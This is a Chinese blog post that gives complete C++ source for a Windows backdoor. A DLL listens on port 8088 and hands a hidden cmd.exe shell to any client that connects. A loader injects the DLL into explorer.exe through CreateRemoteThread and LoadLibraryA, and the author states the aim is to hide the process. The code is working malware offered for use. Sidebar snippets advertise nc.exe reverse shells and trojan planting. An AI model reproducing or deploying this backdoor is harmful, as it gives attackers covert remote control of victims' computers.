NC.EXE结合线程插入技术做的一个后门

最新推荐文章于 2024-07-17 21:12:50 发布
最新推荐文章于 2024-07-17 21:12:50 发布
阅读量904 收藏
点赞数
文章标签: dll null insert socket server attributes

LOOK  
   
  这是我写一文章,把NC.EXE结合线程插入技术做的一个后门,,,  
  你看看吧  
   
  不知道大家用过ncx99.exe没有,这个小工具很有用,运行后,它BIND到一个端口,并接管cmd.exe的输入输出,使得远程用户得到一个SHELL来实现各种操作,不需要特别的客户端,只要用WINDOWS自带的TELNET客户端就可以了。  
  下面我给出类似这个工具的Source code,我这个工具和ncx99.exe有点不一样,用到了远程线程插入技术,将ncx99.exe功能封装在一个DLL里,然后将DLL插入到explorer.exe进程里,使得程序运行后无进程,增强了隐蔽性。  
   
  先给出DLL的Source code:  
   
   
  // test.cpp : Defines the entry point for the DLL application.  
  //  
  #include "stdafx.h"  
  #include   
   
  #define iport 8088  
   
   
   
  static void WINAPI ThreadProc(void* pVoid)  
  {  
  WSADATA wsa;  
  SOCKET serverFD;  
  char Buff[1024];  
   
   
  WSAStartup(MAKEWORD(2,2),&wsa);//初始化WinSock  
   
  serverFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  
   
  struct sockaddr_in server;  
   
  server.sin_family = AF_INET;  
  server.sin_port = htons(iport);  
  server.sin_addr.s_addr=ADDR_ANY;  
  int ret=bind(serverFD,(sockaddr *)&server,sizeof(server));  
  ret=listen(serverFD,4);  
  int iAddrSize = sizeof(server);  
   
  re: SOCKET clientFD=accept(serverFD,(sockaddr *)&server,&iAddrSize);//每次操作完成连接断开后程序  
  //返回这里继续阻塞,等待客户端连接  
   
  SECURITY_ATTRIBUTES sa;  
  sa.nLength=12;  
  sa.lpSecurityDeor=0;  
  sa.bInheritHandle=true;  
  HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;  
   
  ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);//创建两个匿名管道  
  ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);  
   
  STARTUPINFO si;  
  ZeroMemory(&si,sizeof(si));  
  si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;  
  si.wShowWindow = SW_HIDE;  
  si.hStdInput = hReadPipe2;  
  si.hStdOutput = si.hStdError = hWritePipe1;  
  char cmdLine[] = "cmd.exe";  
  PROCESS_INFORMATION ProcessInformation;  
  ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);//将匿名管道和cmd.exe的输入输出关联  
   
   
  unsigned long lBytesRead;  
   
  while(1)   
  {  
  ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);//管道是否有数据可读  
  if(lBytesRead)   
  {  
  ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);//读取管道里的数据  
  if(!ret)  
  break;  
  ret=send(clientFD,Buff,lBytesRead,0);//将cmd.exe的输出通过socket发送到客户端  
  if(ret<=0)   
  break;  
  }  
  else  
  {  
  lBytesRead=recv(clientFD,Buff,1024,0);//将socket数据读出  
  if(lBytesRead<=0)  
  break;  
  ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);//将接收到的客户端输入写进管道作为cmd.exe输入  
  send(clientFD,Buff,lBytesRead,0);  
  if(!ret) break;  
  }  
  }   
  goto re;  
   
  return;  
  }  
   
   
   
  HANDLE hThreadHandle = NULL;   
  HANDLE HT=NULL;  
   
   
  BOOL APIENTRY DllMain( HANDLE hModule,   
  DWORD fdwReason,   
  LPVOID lpReserved  
  )  
  {  
  switch(fdwReason)  
  {  
  case DLL_PROCESS_ATTACH://首次装载DLL,创建一线程  
  {  
  DWORD dwThreadID;  
  hThreadHandle = CreateThread(NULL, 0, (unsigned long (__stdcall *)(void *))ThreadProc, NULL, 0, &dwThreadID);  
  }  
  break;  
  case DLL_PROCESS_DETACH:  
  {  
   
  if(hThreadHandle)  
  TerminateThread(hThreadHandle,0);  
  }  
   
  break;  
  case DLL_THREAD_ATTACH:  
  break;  
  case DLL_THREAD_DETACH:  
  break;  
  }   
  return TRUE;  
  }  
   
   
  /******************************************************************/  
   
  接下来是插入DLL到explorer.exe进程里的代码,要将DLL插入到explorer进程里,首先要得到这个进程的ID,下面是取得进程ID的代码:  
  DWORD CInsertDlg::GetProcessId()//获取explorer.exe进程的ID  
  {  
  DWORD Pid=-1;  
  HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);//创建系统快照  
  PROCESSENTRY32 lPrs;  
  ZeroMemory(&lPrs,sizeof(lPrs));  
  lPrs.dwSize=sizeof(lPrs);  
  Process32First(hSnap,&lPrs);//取得系统快照里第一个进程信息  
  if (strstr(targetFile,lPrs.szExeFile))//判断进程信息是否是explorer.exe  
  {  
  Pid=lPrs.th32ProcessID;  
  return Pid;  
  }  
   
  while(1)  
  {  
  ZeroMemory(&lPrs,sizeof(lPrs));  
  lPrs.dwSize=(&lPrs,sizeof(lPrs));  
  if (!Process32Next(hSnap,&lPrs))//继续枚举进程信息  
  {  
  Pid=-1;  
  break;  
  }  
  if (strstr(targetFile,lPrs.szExeFile))  
  {  
  Pid=lPrs.th32ProcessID;  
  break;  
  }  
  }  
   
  return Pid;  
   
  }  
   
   
  /***************************************************************/  
  得到进程的ID后,就可以执行进程插入:  
   
   
  void CInsertDlg::OnButton1()   
  {  
  // TODO: Add your control notification handler code here  
  DWORD Pid=-1;  
  Pid=GetProcessId();//得到进程ID  
   
  if (Insert(Pid))//执行远程进程注入  
  {  
  ::MessageBox(NULL,"Insert the dll to target process is success!","Insert",MB_ICONINFORMATION);  
  }  
  else  
  {  
  ::MessageBox(NULL,"Insert the dll to target process if failed!","Insert",MB_ICONINFORMATION);  
  }  
  }  
   
  BOOL CInsertDlg::Insert(DWORD dwProcessId)  
   
  {  
   
  HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessId);//得到对目标进程操作的所有权限  
   
  if (hProcess==NULL)  
  {  
  return FALSE;  
  }  
   
  char szModulePath[MAX_PATH];  
  GetModuleFileName(NULL,szModulePath,MAX_PATH);  
  PathRemoveFileSpec(szModulePath);  
  CString strModlePath = _T(szModulePath);  
  if(strModlePath[strModlePath.GetLength() - 1] != '//')strModlePath += _T('//');   
  strModlePath += _T("test.dll");//获取DLL路径  
   
   
  //为DLL路径分配内存空间  
  LPVOID RemoteMemory = VirtualAllocEx(hProcess,NULL,strModlePath.GetLength() + 1,MEM_COMMIT,PAGE_READWRITE);   
   
  if (RemoteMemory==NULL)  
  {  
  return FALSE;  
  }  
   
   
  //将DLL路径写入目标进程的分配的内存  
  if (!WriteProcessMemory(hProcess,RemoteMemory,(void *)(LPCTSTR)strModlePath,strModlePath.GetLength() + 1,NULL))  
  {  
  return FALSE;  
  }  
   
  //得到LoadLibraryA函数的指针  
  PTHREAD_START_ROUTINE pfn=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryA");  
   
  if (pfn==NULL)  
  {  
  return FALSE;  
  }  
   
   
  //在远程进程里创建线程  
  HANDLE hThread=CreateRemoteThread(hProcess,NULL,0,pfn,RemoteMemory,0,NULL);  
   
  if (hThread==NULL)  
  {  
  return FALSE;  
  }  
   
  WaitForSingleObject(hThread,INFINITE);//等待线程的返回  
   
  VirtualFreeEx(hProcess,RemoteMemory,0,MEM_RELEASE);//释放内存  
  CloseHandle(hThread);  
  CloseHandle(hProcess);  
   
  return TRUE;  
  }  
   
   
  参考资料:  
  《WINDOWS核心编程》  
  MSDN  

lionzl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
成为黑客必须掌握的知识!
weixin_30814319的博客
11-02 7596
最高境界,总结、归纳、创新这个数学上的不二法宝,这大概就是黑客的最高境界吧! 成为黑客必须掌握的知识 一、一定的英文水平 大家都知道,计算机的起源来自于国外,多数的资料、编程语言、命令等都是以英文为基础的,所以一定的英文水品是必要的,当然了,这并不能阻挡我们中国人学习黑科技术的脚步,如果英文水平欠佳,找本字典,或者是翻译app就可以了。 同时也能希望我国的科技发展能够更进一步,开发出汉字的...
ncx开远端Telnet工具
06-10
ncx99.exe开远端Telnet工具
WEB渗透之相关概念(笔记)
最新发布
SXXYNHHXX的博客
07-17 911
cdn全称是内容分发网络。其目的是让用户能够更快速的得到请求的数据。简单来讲,cdn就是用来加速的,他能让用户就近访问数据,这样就更更快的获取到需要的数据。举个例子,现在服务器在北京,深圳的用户想要获取服务器上的数据就需要跨越一个很远的距离,这显然就比北京的用户访问北京的服务器速度要慢。但是现在我们在深圳建立一个cdn服务器,上面缓存住一些数据,深圳用户访问时先访问这个cdn服务器,如果服务器上有用户请求的数据就可以直接返回,这样速度就大大的提升了。
端口大全
专注Oracle EBS---低调的奢华
11-07 8739
0|无效端口,通常用于分析操作系统 1|传输控制协议端口服务多路开关选择器 2|管理实用程序 3|压缩进程 5|远程作业登录 7|回显 9|丢弃 11|在线用户 13|时间 17|每日引用 18|消息发送协议 19|字符发生器 20|FTP文件传输协议(默认数据口) 21|FTP文件传输协议(控制) 22|SSH远程登录协议 23|tel
win10下可用的nc.exe工具
03-17
亲测win10下可用。
Netcat-nc.exe.zip
05-21
亲测可以成功运行,各种命令测试成功。其中包含nc.exenc64.exe。 可以获得目标主机的Shell,已成功实验。
nc.exe 网络工具
01-06
nc.exe工具,可以用来反弹shell,exe只支持windows中使用,Linux中有的自动安装了nc工具,和windows中用法一样。
瑞士军刀nc.exe(含代码,网络整理,内含多款nc)
12-18
本人未对上传工具进行任何二次修改!本软件为工具软件,可能会有部分杀毒软件报毒!可以使用虚拟机断网进行安全测试,如介意请勿下载。请勿进行学习之外的使用,本人不对不当或非法使用此软件负责,网络整理搬侵删!
收集的两个nc.exe文件(源代码+exe文件)
01-02
2.NC瑞士军刀nc.exe(附代码) 参数说明: -h 查看帮助信息 -d 后台模式 -e prog程序重定向,一但连接就执行[危险] -i secs延时的间隔 -l 监听模式,用于入站连接 -L 监听模式,连接天闭后仍然继续监听,...
给自己的软件添加后门
01-07
C#.NET给自己的软件添加后门
一个PE软件后门添加器EXE后门添加
02-22
一个软件PE后门添加器,直接向PE文件写入shellcode,达到启动软前先启动后门的目的,代码值得参考
路由如何封锁软件(举例封锁PPTV及常用端口介绍非常详细)
y1g1t1的专栏
08-23 2049
路由如何封锁软件(举例封锁PPTV及常用端口介绍非常详细) 1.把电脑上所有需要访问网络的进程都关掉. 2.在路由的“行为管理”—“访问控制”里面增加一条禁止192.168.11.101上网的策略执行顺序为“10”并启用日志,如下图: 1.jpg (
各个端口的作用和怎么关闭不必要的端口
战斗机
08-04 468
[color=red][b]1.各个端口的作用[/b][/color] 端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 端口:1 服务:tcpmux 说明:这显示有人在寻找S...
详细端口分配表(2)
weixin_34054866的博客
02-05 99
端口80服务HTTP说明用于网页浏览。***Executor开放此端口。端口99服务Metagram Relay说明后门程序ncx99开放此端口。端口102服务Message transfer agent(MTA)-X.400 over TCP/IP说明消息传输代理。端口109服务Post Office Protocol -Version3说明POP3服务器开放此端口,用于接...
利用unicode漏洞种木马的一点心得
~缘份天空~
05-17 1414
马木 必备装备:代理猎手v3.1可是最新版,unicode漏洞扫描器,ncx99木马,tftpd32一个ftp服务器软件,(下载地址:http://www.cners.com/tools/unicode.zip),bionet木马(这个不用我告诉你哪里下了吧)。  好了,可以开始工作了。。。。。 1、用代理猎手扫80端口,我为什么不用supperscan呢?后面自由分晓。扫到后保存一下列表,
计算机端口
heyouqianqiu的专栏
04-22 1964
 首先介绍一下什么是计算机端口?计算机“端口”是英文port的义译,可以认为是计算机与外界通讯交流的出口。硬件领域的端口又称接口,如:USB端口、串行端口等。软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和I/O(基本输入输出)缓冲区。我们在计算机的任何操作都在有意无意的使用着计算机的各个端口,下面列出了计算机的常用
服务器上所有端口的详细介绍及作用
weixin_33889245的博客
08-14 1522
服务器上所有端口的详细介绍及作用代理服务器常用以下端口:(1).HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080(2).SOCKS代理协议服务器常用端口号:1080(3).FTP(文件传输)协议代理服务器常用端口号:21(4).Telnet(远程登录)协议代理服务器常用端口:23HTTP服务器,默认的端口号为80/tcp(***Execu...
nc.exe命令 下载
07-20
### 回答1: nc.exe一个网络工具的执行文件,是Netcat的Windows版本。Netcat是一种可以通过TCP和UDP在网络上进行数据传输的命令行工具。 使用nc.exe命令进行下载主要是通过网络传输文件。我们可以使用如下命令格式进行下载操作: nc.exe ip地址 端口号 > 文件名 其中,ip地址是目标服务器的IP地址,端口号是服务器监听的端口号,文件名是保存下载文件的名称。 在执行该命令后,nc.exe会与目标服务器建立连接并接收服务器端发送的数据,然后将接收到的数据保存到指定的文件中。 在实际应用中,我们可以将nc.exe命令与其他命令或脚本文件结合使用,实现更多的下载功能。例如,我们可以使用nc.exe命令下载一个远程服务器上的文件,然后再通过脚本对下载的文件进行处理或解析。 需要注意的是,下载文件时需要确保目标服务器上的端口处于开启状态,并且具备下载权限。同时,由于nc.exe属于第三方工具,下载和使用时需要注意安全性,避免下载到恶意文件或用于非法用途。 总结来说,nc.exe一个功能强大的网络工具,通过该命令和其他工具的结合使用,可以实现网络文件的下载操作。 ### 回答2: nc.exe命令是一种用于网络通信的工具,可以在Windows操作系统下使用。它可以通过指定IP地址和端口号来进行网络连接和数据传输。nc.exe命令可以用于多种网络应用,例如端口扫描、文件传输和远程控制等。 在下载nc.exe命令时,我们可以通过以下几个步骤: 1. 首先,在互联网上搜索并找到可信赖的nc.exe文件下载源。建议选择官方或其他信誉良好的软件下载网站来确保文件的可靠性和安全性。 2. 进入所选下载源网站,搜索nc.exe命令并定位到下载页面。在下载页面上,往往会提供下载链接或按钮。 3. 点击下载链接或按钮,并选择保存文件的位置。可以选择将nc.exe命令保存到计算机的本地文件夹中,例如桌面或指定的软件安装目录。 4. 下载完成后,定位到保存的nc.exe文件,并进行必要的安全检查。可以使用杀毒软件扫描文件,以确保它不包含任何恶意软件或病毒。 5. 如果安全检查通过,即可开始使用nc.exe命令。通过命令行界面进入所保存的nc.exe文件所在的目录,并输入相应的nc.exe命令及其参数,即可进行网络通信操作。 需要注意的是,使用nc.exe命令时应遵守相关法律法规,并且只在合法授权的情况下进行网络操作,以保证网络安全和合法性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值